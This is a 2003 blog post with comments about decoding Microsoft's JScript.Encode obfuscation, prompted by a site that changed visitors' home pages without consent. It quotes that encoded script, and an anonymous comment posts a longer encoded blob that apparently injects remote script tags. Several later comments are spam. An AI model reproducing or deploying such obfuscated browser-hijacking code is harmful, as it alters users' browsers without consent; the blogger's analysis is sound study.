July 12, 2003

Javascript.Encode

Nasty... the other day I ran across a site that automatically sets your home page, without permissions! Naturally it piqued my interest, and after repeated telneting, I finally found the source of the problem... well, almost. It turns out that the source was an 'encoded' Javascript. Thanks to microsoft, there is a handy little command which 'encodes' (not encrypts) your ASP/VBScript/Javascript code. I found a good tutorial here on attempting to break the code. Here's what the code looked like:

[SCRIPT language=JScript.Encode]#@~^RwAAAA==@&9W^!:xYcVK^lDkGxct.n6'J4OYa)zJdn68FyR^Wh&^tG/Ddz1W;UDRw42Ql^m{qyJI@&0hcAAA==^#~@[/SCRIPT]
Nicely, mrbrownstone has done all the work. Behold, the Win32 command line executable: srcdec14.exe and source code (for Unix): srcdec14.c. Hmm, I tried it, but it keeps giving checksum errors. On mrbrownstone's page I found a link to Soya's Java version. Which also doesn't give intelligible answers. Here's another super html decoder page. Posted by torque at July 12, 2003 12:00 PM | TrackBack
Comments

#@~^dQkAAA==r6Pc,o|/y;Ws2k^+\W9+ OKjwanD;l/cbP{',BjI/v,#@#@&P@#@&iNG^!:+UOch.kDn^xcr@!kmDbwD~Sz1!jzM3xE9?1.kaYB,d.m{BcR&R&BkzdD1&YHwn N/B@*@!J/^Db2D@*E*i@#@&d9W1;:xORSDrOVxvE@!kmDb2OPdbgMib!3{BB?1.kaYv~kDmxvcR&RJ%kzdMmJfkkl(s+~W[XA\nUDRLkv@*@!z/1.rwD@*r#I@#@&79W^EsnxDRA.bY+sUvJ@!/1.bwO,Sz1M`bV3'E9jmMk2OEP/M^'ERRJ &LkzkD^z8G9X Lkv@*@!zd^MkwO@*r#I@#@&79W^!:xYchMrYVU`r@!d^MkwD~Sz1M`)!2{Bx?^Dr2DB~/M^'ELd&rP_~L|/"8UkOZKN+,_,EzrPQPT{d"dlxT;lT+P3~Ez^l o;lLncLdB@*@!zkm.raY@*Ebp@#@&d9G1EhxDRhMkDnV `E@!km.raYPd)1VjbV3xBx?1DrwOv,/.m{vLkzE~3Pomd.n4UrD+/KNP_,JJEP3PL{kyJC oEmL+,_Pr&Ak NKh Ldv@*@!&/1.kaY@*E*i@#@&79W^Esn Y SDbY+^xvE@!km.kaY~Jz1M`)MA'Bxj^DbwDB~/.^{B%/JdD1z[n6lEsOcLdB@*@!J/^MkaY@*r#p@#@&@#@&7NKm;hxYcADbY+^UcJ@!/1DrwO~dbHM`)MA'vBUmDr2DB~/M^{B4DYa)zJJ,QPT{dyt/LjbY+`]S,_Pr&%/JYKwm:dLJ/.mJ^tmY^G x+^OcLdB@*@!J/^MkaY@*r#p@#@&iNGm!:nUDRhMrYVxvE@!/1DbwOPJ)gMibV3'E9j^MkwOv,/.m{v4YOa)JzJ,_,L{ky\/T?rOjId~_,JzNd&YKw|:do&dMm&NWl!VO N/B@*@!J/^Db2D@*E*i@#@&d9W1;:xORSDrOVxvE@!kmDb2OPdbgMib!3{BB?1.kaYv~kDmxv4YOw=&JJ~3PT{/.HkL?bYnj"S~Q,JzNdzDWw|hdoJ/Mm&:dL1Vr+ ORN/v@*@!z/^.bwO@*rbp@#@&iNKmEs+ ORSDrYVUcr@!/1.kaYPd)HM`bV2xBBj1DrwDvPkD^xEtYO2=z&J,Q,omkyt/oUkDnj"S~_,J&%kzfb-AK6RNdv@*@!zkm.k2O@*Jbi@#@&@#@&8@#@&V/n@#@& @#@&i[Km;s+ YRSDbO+^xcJ@!/^.bwY,JbgMjz!3'E9Um.k2Oc2UmK[+EPd.1'B JR&9k&x^JYHw+cLknB@*@!&/1Dr2D@*J*I@#@&dNK^;:xDRADrOVU`r@!/1Dr2DPS)HVj)MAxE9j1DbwYc2 ^W9+vPkD^xERRJ zN/zU^zGkkl8Vn$KNz27nxDR%dB@*@!&km.kaO@*Jbp@#@&dNKm!h+ Y hMkOn^x`r@!/1DkaO~Sz1Vj)M3xE9jmMrwDR3U1WNnv,/.m{vcR&czN/zx1&4KNzRN/nv@*@!zk^DbwY@*Ebi@#@&iNGm;hxORS.kD+sUvJ@!d^Mk2Y,Jz1!`bV2'E9U^DbwOBidd.1'BNdzrP_,Lm/.4jkOn;W[+,QPrzE~3Pomd.SCxT;mon,_,Jz^l LEmonRN/v@*@!z/1.kaY@*rbI@#@&d9W^Ehn Y hMrYVUcr@!/^.bwOPd)gMizMA'Bx?1.kaYvdi/.^{BLk&J,_PTmdyq+(?rYn/KNnP3~JJJ~Q,o{d"dlUo!CT+~3Przhbx9GhcLdB@*@!&d1DkaO@*r#i@#@&7NKm!:nxO SDrYsxvJ@!d1Dk2O,S)1VizM3{Bx?mMkaORAx^W9+v~kDm{vLkz+ ^&N0mEsY %k+v@*@!&/1Dr2D@*JbI@#@&@#@&i[Km;s+ YRSDbO+^xcJ@!/^.bwY,JbgMjz!3'E9Um.k2OEPdD1xB4YO2=zzE~3PL{k"t/LUkD+j"S,QPrz%/JYG2|:/T&/Mmz14CY1W xnmO N/v@*@!&/1Dr2D@*JbI@#@&7NK^!:n YchDbYsxvJ@!/1Dr2DPSzHM`bMAxv9UmMk2Yv~kD^'E4YDwl&JJPQ~T{dytdT?rD+`IS,_,EzN/&YKwmhkozk.mJN+6C;VDRN/v@*@!&km.kaO@*r#I@#@&dNG^!:nxD SDrD+^x`r@!k^DbwOPdbH!`bMAxBx?mMr2YEPkD^'v4DY2)J&J,_~L|/y\dT?rYi"S~3PrzLkzDGw|:doJ/.^J:/T^Vb+xD %/E@*@!zdm.raY@*J*I@#@&d[G1E:nUDRADbOVUvJ@!/mMkaOPdbHM`b!3{B9U^DbwYE~dD1'EtOY2lJzEP3~o|/"\ko?rOj]S,Q,J&N/Jfk7AKaRN/v@*@!zd^MkwD@*J*i@#@&N@#@&@#@&@#@&a94CAA==^#~@

Posted by: at December 26, 2003 6:43 AM

How do i use the super html decoder? I tried putting in an address. I dont know how it works :)

lol, Can you tell me?

Posted by: gyro at March 21, 2004 12:46 PM

news

Posted by: news- at August 21, 2004 11:31 PM

The soya java page mentioned in a previous post worked quite well for me.
http://www.saltstorm.net/lib-soya/examples/Soya.Encode.ScriptDecoder.wbm?pod=js

I entered the coded url in the top box,removed the start and ending script tags, clicked on decode and the deobfuscated text appeared in the lower box.

That is a Very nice page.

Posted by: Jim at September 10, 2004 7:15 AM

The soya java page mentioned in a previous post worked quite well for me.
http://www.saltstorm.net/lib-soya/examples/Soya.Encode.ScriptDecoder.wbm?pod=js

I entered the coded url in the top box,removed the start and ending script tags, clicked on decode and the deobfuscated text appeared in the lower box.

That is a Very nice page.

Posted by: Jim at September 10, 2004 7:20 AM

Jonathan Ross is dubbed "risque" by Ofcom but not in breach of rules over an interview with David Cameron...

Posted by: Grayson Lindberg at December 7, 2006 4:17 AM

paris hilton porn foto.. [url=][/url]

Posted by: paris hilton porn foto.. [url=][/url] at December 8, 2006 9:47 PM

through it... [url=][/url]

Posted by: through it... [url=][/url] at December 10, 2006 10:47 AM
Post a comment









Remember personal info?